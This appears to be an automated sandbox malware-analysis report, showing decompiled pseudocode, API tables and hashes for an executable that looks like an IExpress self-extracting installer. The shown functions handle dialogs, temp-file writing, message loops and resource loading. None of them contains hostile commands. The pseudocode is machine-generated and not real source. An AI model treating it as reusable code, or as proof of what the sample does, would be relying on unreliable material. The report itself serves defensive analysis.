                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009741be
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746A0
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: SizeofResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746A9
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746C3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LoadResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746CC
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LockResource.KERNEL32(00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746D3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: memcpy_s.MSVCRT ref: 009746E5
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009746EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,009730B4), ref: 00974189
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,009730B4), ref: 009741E7
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00974518
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00974554
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                              • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                              • Opcode ID: fa11f50ca5b34bf8e42dac7b6275fe0386980bafb340894aa5da851297863462
                                                                                                                                                                                                                                              • Instruction ID: c2affcc95bd9d1976d1493f02d655c74dad2f743ef6cb0134f6cc53c63321d8d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa11f50ca5b34bf8e42dac7b6275fe0386980bafb340894aa5da851297863462
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6901F4B33082243BF32426694C86F7F218EDBE5B99F40C435B70DE1192DB68CC415179
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E009719E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v520;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t11;
                                                                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                                                                              				struct HWND__* _t34;
                                                                                                                                                                                                                                              				signed int _t35;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t33 = __edi;
                                                                                                                                                                                                                                              				_t27 = __ebx;
                                                                                                                                                                                                                                              				_t11 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                              				_t34 = _a4;
                                                                                                                                                                                                                                              				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                              				if(_t14 == 0) {
                                                                                                                                                                                                                                              					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                              					E009743D0(_t34, _t15);
                                                                                                                                                                                                                                              					_v520 = 0;
                                                                                                                                                                                                                                              					LoadStringA( *0x979a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                              					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                              					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					if(_t14 != 1) {
                                                                                                                                                                                                                                              						L4:
                                                                                                                                                                                                                                              						_t23 = 0;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t32 = _a12;
                                                                                                                                                                                                                                              						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                              							goto L4;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                              							L6:
                                                                                                                                                                                                                                              							_t23 = 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                              			}













                                                                                                                                                                                                                                              0x009719e0
                                                                                                                                                                                                                                              0x009719e0
                                                                                                                                                                                                                                              0x009719eb
                                                                                                                                                                                                                                              0x009719f2
                                                                                                                                                                                                                                              0x009719f9
                                                                                                                                                                                                                                              0x009719fc
                                                                                                                                                                                                                                              0x00971a01
                                                                                                                                                                                                                                              0x00971a2a
                                                                                                                                                                                                                                              0x00971a2e
                                                                                                                                                                                                                                              0x00971a3e
                                                                                                                                                                                                                                              0x00971a4f
                                                                                                                                                                                                                                              0x00971a62
                                                                                                                                                                                                                                              0x00971a6a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00971a03
                                                                                                                                                                                                                                              0x00971a06
                                                                                                                                                                                                                                              0x00971a20
                                                                                                                                                                                                                                              0x00971a20
                                                                                                                                                                                                                                              0x00971a08
                                                                                                                                                                                                                                              0x00971a08
                                                                                                                                                                                                                                              0x00971a14
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00971a16
                                                                                                                                                                                                                                              0x00971a18
                                                                                                                                                                                                                                              0x00971a70
                                                                                                                                                                                                                                              0x00971a72
                                                                                                                                                                                                                                              0x00971a72
                                                                                                                                                                                                                                              0x00971a14
                                                                                                                                                                                                                                              0x00971a06
                                                                                                                                                                                                                                              0x00971a81

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EndDialog.USER32(?,?), ref: 00971A18
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00971A24
                                                                                                                                                                                                                                              • LoadStringA.USER32(?,?,00000200), ref: 00971A4F
                                                                                                                                                                                                                                              • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00971A62
                                                                                                                                                                                                                                              • MessageBeep.USER32(000000FF), ref: 00971A6A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1273765764-0
                                                                                                                                                                                                                                              • Opcode ID: 41046b2a281515b6276a92d901511d52f39e9c625ece3fcba5a481d92f66b00b
                                                                                                                                                                                                                                              • Instruction ID: 1858f29ed0258d09a35a50539cde00a023d2a65671044e9ed1f47a1201331cec
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41046b2a281515b6276a92d901511d52f39e9c625ece3fcba5a481d92f66b00b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3811E5336191099FDB04EF68DE08AAE77B8FF89700F408160F51A92190CA309E40DB91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                                                                                                              			E009763C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				long _v272;
                                                                                                                                                                                                                                              				void* _v276;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t15;
                                                                                                                                                                                                                                              				long _t28;
                                                                                                                                                                                                                                              				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                                                              				void* _t39;
                                                                                                                                                                                                                                              				signed int _t40;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t15 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                                                              				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_v276 = _a16;
                                                                                                                                                                                                                                              				_t37 = 1;
                                                                                                                                                                                                                                              				E00971781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                              				E0097658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                                                              				_t28 = 0;
                                                                                                                                                                                                                                              				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                              				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                                                              					_t28 = _a4;
                                                                                                                                                                                                                                              					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                                                              						 *0x979124 = 0x80070052;
                                                                                                                                                                                                                                              						_t37 = 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					CloseHandle(_t39);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					 *0x979124 = 0x80070052;
                                                                                                                                                                                                                                              					_t37 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                                                              			}















                                                                                                                                                                                                                                              0x009763cb
                                                                                                                                                                                                                                              0x009763d2
                                                                                                                                                                                                                                              0x009763d8
                                                                                                                                                                                                                                              0x009763ea
                                                                                                                                                                                                                                              0x009763f3
                                                                                                                                                                                                                                              0x00976401
                                                                                                                                                                                                                                              0x00976402
                                                                                                                                                                                                                                              0x00976410
                                                                                                                                                                                                                                              0x00976415
                                                                                                                                                                                                                                              0x00976433
                                                                                                                                                                                                                                              0x00976438
                                                                                                                                                                                                                                              0x00976449
                                                                                                                                                                                                                                              0x00976463
                                                                                                                                                                                                                                              0x0097646d
                                                                                                                                                                                                                                              0x00976477
                                                                                                                                                                                                                                              0x00976477
                                                                                                                                                                                                                                              0x0097647a
                                                                                                                                                                                                                                              0x0097643a
                                                                                                                                                                                                                                              0x0097643a
                                                                                                                                                                                                                                              0x00976444
                                                                                                                                                                                                                                              0x00976444
                                                                                                                                                                                                                                              0x00976492

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0097642D
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0097645B
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0097647A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 009763EB
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                              • API String ID: 1065093856-305352358
                                                                                                                                                                                                                                              • Opcode ID: acc308a59496e7458164f14204301fc40b5b9fe2bd99b20043c9330e97cbadcc
                                                                                                                                                                                                                                              • Instruction ID: a5e770802a417c31625ddd81d1647c29c5f5d11755d40b18daf715ba8b652853
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: acc308a59496e7458164f14204301fc40b5b9fe2bd99b20043c9330e97cbadcc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B21D273A04218ABDB10DF25DC85FEB77ACEB85314F0081A9F589A3290DAB45DC48FA4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E009747E0(intOrPtr* __ecx) {
                                                                                                                                                                                                                                              				intOrPtr _t6;
                                                                                                                                                                                                                                              				intOrPtr _t9;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				void* _t19;
                                                                                                                                                                                                                                              				intOrPtr* _t22;
                                                                                                                                                                                                                                              				void _t24;
                                                                                                                                                                                                                                              				struct HWND__* _t25;
                                                                                                                                                                                                                                              				struct HWND__* _t26;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				intOrPtr* _t28;
                                                                                                                                                                                                                                              				intOrPtr* _t33;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t33 = __ecx;
                                                                                                                                                                                                                                              				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                              				if(_t34 != 0) {
                                                                                                                                                                                                                                              					_t22 = _t33;
                                                                                                                                                                                                                                              					_t27 = _t22 + 1;
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						_t6 =  *_t22;
                                                                                                                                                                                                                                              						_t22 = _t22 + 1;
                                                                                                                                                                                                                                              					} while (_t6 != 0);
                                                                                                                                                                                                                                              					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                                                              					 *_t34 = _t24;
                                                                                                                                                                                                                                              					if(_t24 != 0) {
                                                                                                                                                                                                                                              						_t28 = _t33;
                                                                                                                                                                                                                                              						_t19 = _t28 + 1;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t9 =  *_t28;
                                                                                                                                                                                                                                              							_t28 = _t28 + 1;
                                                                                                                                                                                                                                              						} while (_t9 != 0);
                                                                                                                                                                                                                                              						E00971680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                                                              						_t11 =  *0x9791e0; // 0x3077270
                                                                                                                                                                                                                                              						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                                                              						 *0x9791e0 = _t34;
                                                                                                                                                                                                                                              						return 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t25 =  *0x978584; // 0x0
                                                                                                                                                                                                                                              					E009744B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                              					LocalFree(_t34);
                                                                                                                                                                                                                                              					L2:
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t26 =  *0x978584; // 0x0
                                                                                                                                                                                                                                              				E009744B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                                                              				goto L2;
                                                                                                                                                                                                                                              			}















                                                                                                                                                                                                                                              0x009747e8
                                                                                                                                                                                                                                              0x009747f0
                                                                                                                                                                                                                                              0x009747f4
                                                                                                                                                                                                                                              0x0097480f
                                                                                                                                                                                                                                              0x00974811
                                                                                                                                                                                                                                              0x00974814
                                                                                                                                                                                                                                              0x00974814
                                                                                                                                                                                                                                              0x00974816
                                                                                                                                                                                                                                              0x00974817
                                                                                                                                                                                                                                              0x00974829
                                                                                                                                                                                                                                              0x0097482b
                                                                                                                                                                                                                                              0x0097482f
                                                                                                                                                                                                                                              0x0097484f
                                                                                                                                                                                                                                              0x00974852
                                                                                                                                                                                                                                              0x00974855
                                                                                                                                                                                                                                              0x00974855
                                                                                                                                                                                                                                              0x00974857
                                                                                                                                                                                                                                              0x00974858
                                                                                                                                                                                                                                              0x00974860
                                                                                                                                                                                                                                              0x00974865
                                                                                                                                                                                                                                              0x0097486a
                                                                                                                                                                                                                                              0x0097486f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974876
                                                                                                                                                                                                                                              0x00974831
                                                                                                                                                                                                                                              0x00974841
                                                                                                                                                                                                                                              0x00974847
                                                                                                                                                                                                                                              0x0097480b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097480b
                                                                                                                                                                                                                                              0x009747f6
                                                                                                                                                                                                                                              0x00974806
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00974E6F), ref: 009747EA
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00974823
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00974847
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00974518
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00974554
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00974851
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                              • API String ID: 359063898-305352358
                                                                                                                                                                                                                                              • Opcode ID: e4e08dadd61b462910d6efed859fb8db3eb57f517c27bad1843776e12b2079f0
                                                                                                                                                                                                                                              • Instruction ID: 2ae9101b98ea9b8c7c8738ffaf5aa85355d62ead67e7dd48f334f53d9bd2218a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4e08dadd61b462910d6efed859fb8db3eb57f517c27bad1843776e12b2079f0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 171125772086416FE7149F249C18FB73BAAEBC5300B04C919FA8A8B342EB358C06D760
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00973680(void* __ecx) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				struct tagMSG _v36;
                                                                                                                                                                                                                                              				int _t8;
                                                                                                                                                                                                                                              				struct HWND__* _t16;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_v8 = __ecx;
                                                                                                                                                                                                                                              				_t16 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                                                              					if(_t8 == 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							if(_v36.message != 0x12) {
                                                                                                                                                                                                                                              								DispatchMessageA( &_v36);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t16 = 1;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                                                              						} while (_t8 != 0);
                                                                                                                                                                                                                                              						if(_t16 == 0) {
                                                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					break;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t8;
                                                                                                                                                                                                                                              			}







                                                                                                                                                                                                                                              0x0097368c
                                                                                                                                                                                                                                              0x0097368f
                                                                                                                                                                                                                                              0x00973691
                                                                                                                                                                                                                                              0x0097369f
                                                                                                                                                                                                                                              0x009736a7
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009736ba
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009736bc
                                                                                                                                                                                                                                              0x009736bc
                                                                                                                                                                                                                                              0x009736c0
                                                                                                                                                                                                                                              0x009736cb
                                                                                                                                                                                                                                              0x009736c2
                                                                                                                                                                                                                                              0x009736c4
                                                                                                                                                                                                                                              0x009736c4
                                                                                                                                                                                                                                              0x009736da
                                                                                                                                                                                                                                              0x009736e0
                                                                                                                                                                                                                                              0x009736e6
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009736e6
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009736ba
                                                                                                                                                                                                                                              0x009736ed

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0097369F
                                                                                                                                                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009736B2
                                                                                                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 009736CB
                                                                                                                                                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009736DA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2776232527-0
                                                                                                                                                                                                                                              • Opcode ID: 6e1e9282329034d5fa7eb0ba0374f3169e1d6bfc72093f0f6fbfa15d2d5d7a6e
                                                                                                                                                                                                                                              • Instruction ID: 0c5b557e2151508d678a0b17ae25eb2feb4e8eb09e5c83268dc9ce47c7e59f22
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e1e9282329034d5fa7eb0ba0374f3169e1d6bfc72093f0f6fbfa15d2d5d7a6e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6201A7739042547BDF304BA65C49FEF767CEBC5F11F10811DF909E2180D561D640E660
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                                                                                                              			E00976517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                              				struct HRSRC__* _t6;
                                                                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                              				int _t24;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t23 =  *0x979a3c; // 0x970000
                                                                                                                                                                                                                                              				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                              				if(_t6 == 0) {
                                                                                                                                                                                                                                              					L6:
                                                                                                                                                                                                                                              					E009744B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					_t24 = _a16;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                                                              					if(_t21 == 0) {
                                                                                                                                                                                                                                              						goto L6;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if(_a12 != 0) {
                                                                                                                                                                                                                                              							_push(_a12);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                                                              						FreeResource(_t21);
                                                                                                                                                                                                                                              						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t24;
                                                                                                                                                                                                                                              			}







                                                                                                                                                                                                                                              0x0097651f
                                                                                                                                                                                                                                              0x0097652a
                                                                                                                                                                                                                                              0x00976534
                                                                                                                                                                                                                                              0x0097656b
                                                                                                                                                                                                                                              0x00976577
                                                                                                                                                                                                                                              0x0097657c
                                                                                                                                                                                                                                              0x00976536
                                                                                                                                                                                                                                              0x0097653e
                                                                                                                                                                                                                                              0x00976542
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00976544
                                                                                                                                                                                                                                              0x00976547
                                                                                                                                                                                                                                              0x0097654c
                                                                                                                                                                                                                                              0x00976549
                                                                                                                                                                                                                                              0x00976549
                                                                                                                                                                                                                                              0x00976549
                                                                                                                                                                                                                                              0x0097655e
                                                                                                                                                                                                                                              0x00976560
                                                                                                                                                                                                                                              0x00976569
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00976569
                                                                                                                                                                                                                                              0x00976542
                                                                                                                                                                                                                                              0x00976587

                                                                                                                                                                                                                                              APIs
